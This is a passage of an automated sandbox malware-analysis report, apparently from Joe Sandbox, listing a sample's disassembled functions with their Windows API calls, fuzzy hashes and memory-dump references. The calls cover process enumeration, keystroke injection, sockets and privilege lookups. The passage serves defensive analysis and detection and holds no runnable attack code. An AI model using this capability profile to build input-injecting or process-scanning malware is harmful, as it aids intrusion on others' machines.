Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: c7e70bdfed61ae65ab2f8b5ddc7a57132603eaea180ad827ebb072047b236cb9
Instruction ID: 5d19f995041b60a9e5394f439a996ed94e8a5c56843bafc8ff19dbcc66a80252
Opcode Fuzzy Hash: c7e70bdfed61ae65ab2f8b5ddc7a57132603eaea180ad827ebb072047b236cb9
Instruction Fuzzy Hash: E451E6306087059ECB209F79D895B6DB3E6BF45310F30991FF556DB2A1DB7098809B04

Function 00C6F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C6F526
Process32FirstW.KERNEL32(00000000,?), ref: 00C6F534

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Process32NextW.KERNEL32(00000000,?), ref: 00C6F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C6F603

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: b009086ad6be3e79b869100dfc839cb9628eabe62b68bda497b125a43d720e1a
Instruction ID: 963597d3c942ca941b8bbe15a245cdef34f8da0a975a51fec01d7cd69b4296b1
Opcode Fuzzy Hash: b009086ad6be3e79b869100dfc839cb9628eabe62b68bda497b125a43d720e1a
Instruction Fuzzy Hash: D5516E71504311AFD320EF24D886B6FB7E8EF95710F10492DF596972A1EB70EA09CB92

Function 00C1492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C149C0
__flush.LIBCMT ref: 00C149E0
__write.LIBCMT ref: 00C14A13
__flsbuf.LIBCMT ref: 00C14A41

Part of subcall function 00C18D58: __getptd_noexit.LIBCMT ref: 00C18D58

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: cb705ec71367c68b4e7e2681808f1d6b244c8ab80bb140eb9fe5371f1d3a4ea3
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 0141D63160070A9BDF2CCE69C8809EF7BAAAF46360F24813DE86587640D771DEC1BB44

Function 00C4A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C4A68A
__itow.LIBCMT ref: 00C4A6BB

Part of subcall function 00C4A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C4A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C4A724
__itow.LIBCMT ref: 00C4A77B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: e0653bc486918c8ca80101f27a57e9c132a3c59e70c752a580c97043144acf39
Instruction ID: 5fc1a41260651b1f1a29eb5af41bab49e02c61949169ebeb1d0eb30526af4ccb
Opcode Fuzzy Hash: e0653bc486918c8ca80101f27a57e9c132a3c59e70c752a580c97043144acf39
Instruction Fuzzy Hash: 25417F74A40209AFDF21EF54C846BEEBBB9BF48750F040029F915A3291DB709A44DBA2

Function 00C67095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00C670BC
WSAGetLastError.WSOCK32(00000000), ref: 00C670CC

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C67130
WSAGetLastError.WSOCK32(00000000), ref: 00C6713C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 3b7e1945e14e877410654a58aeed2add2b5dd84fe561625aeecd81d8bb62e8fe
Instruction ID: 6e69bc72ca74faf877f4304301b6528a00cd71c72f79dfa74ff17a0253d400d0
Opcode Fuzzy Hash: 3b7e1945e14e877410654a58aeed2add2b5dd84fe561625aeecd81d8bb62e8fe
Instruction Fuzzy Hash: C7418E757402046FEB20AF24DC86F7E77E8AB04B14F1485A8FB599B3D2DB709D148B91

Function 00C66B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C80980), ref: 00C66B92
_strlen.LIBCMT ref: 00C66BC4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 4174494c9b17a4173371502c6611130a7bf0d46cfb9edb561d66031f4e9f58bf
Instruction ID: 15299e581a1896e9205aded6a92d6b22b9702cadfd9f80779d53348882525ad7
Opcode Fuzzy Hash: 4174494c9b17a4173371502c6611130a7bf0d46cfb9edb561d66031f4e9f58bf
Instruction Fuzzy Hash: 4541A271A00508ABCB24FBA4DCD5EBEB3A9EF54310F148155F91A9B2D2DF30AE45DB90

Function 00C78E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C78F03

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: f02e31d38fb677644139ca07560427b4dabe2544d78e48a5b3a1de5e2bdf2cc1
Instruction ID: 91215202f08835791524f7b39002dc10465862b0e94189f4f75b41e3375b322b
Opcode Fuzzy Hash: f02e31d38fb677644139ca07560427b4dabe2544d78e48a5b3a1de5e2bdf2cc1
Instruction Fuzzy Hash: 9B31D434681108AEEF209A99CC8DBAC37A6EB06320F64C501FB29D61E1DF71DA58C752

Function 00C7B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00C7B1D2
GetWindowRect.USER32(?,?), ref: 00C7B248
PtInRect.USER32(?,?,00C7C6BC), ref: 00C7B258
MessageBeep.USER32(00000000), ref: 00C7B2C9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: d71d9edf236695e8fdf3ef29c5b5f690cb08df06b1b152789be5dc0d8e28f4da
Instruction ID: 15280340830f58db0fc959ecbcd44aa3fe8bfb9a7ccca0655fb0243447a13f30
Opcode Fuzzy Hash: d71d9edf236695e8fdf3ef29c5b5f690cb08df06b1b152789be5dc0d8e28f4da
Instruction Fuzzy Hash: 89415B30A051199FDB11CF99C884BAD7BF5FF89311F1482A9E82CAB262D731AD41CB50

Function 00C512D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C51326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00C51342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C513A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C513FA

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c13293e3099a796c18ae254458ecba83eb53fdff234377f261c765a6ce9c7124
Instruction ID: eaf8b59f92d40afbe958216ea6a2b8ca8835ccf11f7c9548f482404c7cc65a88
Opcode Fuzzy Hash: c13293e3099a796c18ae254458ecba83eb53fdff234377f261c765a6ce9c7124
Instruction Fuzzy Hash: 33313934940608AEFB308A25881DBFD7BA5AB44322F1C425AECA0525E1D3748ACD9B6D

Function 00C51410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00C51465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C51481
PostMessageW.USER32(00000000,00000101,00000000), ref: 00C514E0
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00C51532

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 07995a83011f4f4762dcf9231833869e058ba3eda59190a2046a06c0ca7909ed
Instruction ID: b1c95feff43cc81b6c99fe92399f1bcbfe6c5abbf91d4cb3b64513cf6e2a1484
Opcode Fuzzy Hash: 07995a83011f4f4762dcf9231833869e058ba3eda59190a2046a06c0ca7909ed
Instruction Fuzzy Hash: 16315C349406485EFF348A658C0CBFEBBA5AB85312F5C431AECA1521D1D3748ACD9B6D

Function 00C263F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C2642B
__isleadbyte_l.LIBCMT ref: 00C26459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C26487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C264BD

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: bfc0ffa1db4ae67ee18e359e303aa82e3357d62e234a2a6b64c94c33c8a6883c
Instruction ID: 1068a2d160ba714aeb2afb9cc1eb2cc5a138465fd10a27e5e4506c05bdb85491
Opcode Fuzzy Hash: bfc0ffa1db4ae67ee18e359e303aa82e3357d62e234a2a6b64c94c33c8a6883c
Instruction Fuzzy Hash: 1A31E431600266EFDB21EF75EC44BAA7BA5FF41320F154069F8A487590DB31EA50E7A0

Function 00C7552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C7553F

Part of subcall function 00C53B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C53B4E
Part of subcall function 00C53B34: GetCurrentThreadId.KERNEL32 ref: 00C53B55
Part of subcall function 00C53B34: AttachThreadInput.USER32(00000000,?,00C555C0), ref: 00C53B5C

GetCaretPos.USER32(?), ref: 00C75550
ClientToScreen.USER32(00000000,?), ref: 00C7558B
GetForegroundWindow.USER32 ref: 00C75591

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 524694107963aa3f6b2cac1b730ffb47a25849a9e14f636da305e840105b9cf6
Instruction ID: 2a7fe5e80817e0de9292a029dcebd68f2934f927c91205879b4cce298f9c5b5d
Opcode Fuzzy Hash: 524694107963aa3f6b2cac1b730ffb47a25849a9e14f636da305e840105b9cf6
Instruction Fuzzy Hash: 4C313071900108AFDB00EFB5C885AEFB7F9EF94304F10406AE515E7201DB71AE448BA4

Function 00C7CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

GetCursorPos.USER32(?), ref: 00C7CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C2BCEC,?,?,?,?,?), ref: 00C7CB8F
GetCursorPos.USER32(?), ref: 00C7CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C2BCEC,?,?,?), ref: 00C7CC16

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: c6b151065ed7581faf81dd28fa6eeb31558da2978685d52a9331c3d9cfbc56fc
Instruction ID: b5f7dd81237b667c0401664d51db77b5bdc9b009c1c149c2153b753c5969b597
Opcode Fuzzy Hash: c6b151065ed7581faf81dd28fa6eeb31558da2978685d52a9331c3d9cfbc56fc
Instruction Fuzzy Hash: C6319E35600018AFCB158F99C899FFE7BB5EB49310F1481A9F9099B261C731AE50EFA0

Function 00C10BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00C10BE2

Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57E51,?,?,00000000), ref: 00C04041
Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57E51,?,?,00000000,?,?), ref: 00C04065

_fprintf.LIBCMT ref: 00C10C19
OutputDebugStringW.KERNEL32(?), ref: 00C4694C

Part of subcall function 00C14CCA: _flsall.LIBCMT ref: 00C14CE3

__setmode.LIBCMT ref: 00C10C4E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 42d2e29d2bebfaf506e4e6e99394956381cf017735905f2d152be7acdf7354be
Instruction ID: c7aafdca89418b584457ec51a2b1abeb1a064aedb0b5cfe70698b779daf30b10
Opcode Fuzzy Hash: 42d2e29d2bebfaf506e4e6e99394956381cf017735905f2d152be7acdf7354be
Instruction Fuzzy Hash: D4116A719041047AC70CB7A4AC42AFE7B6DDF42321F200165F204671C2DF615DD6BBE6

Function 00C49274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C48D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C48D3F
Part of subcall function 00C48D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C48D49
Part of subcall function 00C48D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48D58
Part of subcall function 00C48D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48D5F
Part of subcall function 00C48D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C492C1
_memcmp.LIBCMT ref: 00C492E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C4931A
HeapFree.KERNEL32(00000000), ref: 00C49321

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 68fc03ba16758495edc3e42a0755ce332a97e1da481d5559483f89a10c15d61d
Instruction ID: 00d3e2b56aaea603929a90e424d47f239863cd172f6363736fd44eefa1ebd160
Opcode Fuzzy Hash: 68fc03ba16758495edc3e42a0755ce332a97e1da481d5559483f89a10c15d61d
Instruction Fuzzy Hash: F521BD72E00119EFCB20CFA4C949BEEB7B8FF45301F144059E894A72A0D770AA09DB90

Function 00C7634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00C763BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C763D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C763E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C763F3

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: d8571cdb05ffc29c27adf57a3973adb23b8dd3def77b093e3ffa5118e901e7ac
Instruction ID: 176d60e4a2b518a1d767b84da6acb229596c53ceb22346e844650fd1e1a3d90b
Opcode Fuzzy Hash: d8571cdb05ffc29c27adf57a3973adb23b8dd3def77b093e3ffa5118e901e7ac
Instruction Fuzzy Hash: 9C11E635305918AFD705AB24CC45FBE7799EF45320F148118FA2AC72E2CB70AD05CB98

Function 00C4E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C4E46F,?,?,?,00C4F262,00000000,000000EF,00000119,?,?), ref: 00C4F867
Part of subcall function 00C4F858: lstrcpyW.KERNEL32(00000000,?,?,00C4E46F,?,?,?,00C4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C4F88D
Part of subcall function 00C4F858: lstrcmpiW.KERNEL32(00000000,?,00C4E46F,?,?,?,00C4F262,00000000,000000EF,00000119,?,?), ref: 00C4F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C4E488
lstrcpyW.KERNEL32(00000000,?,?,00C4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C4E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C4E4E2

Strings

cdecl, xrefs: 00C4E4D9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 87c1081a924756c9b52c4741284aa813beec56e79635191942e99491c781c057
Instruction ID: 7a325d2f364beee594ff677acb113423c1ef3789f4a92ecff5c50602485cda43
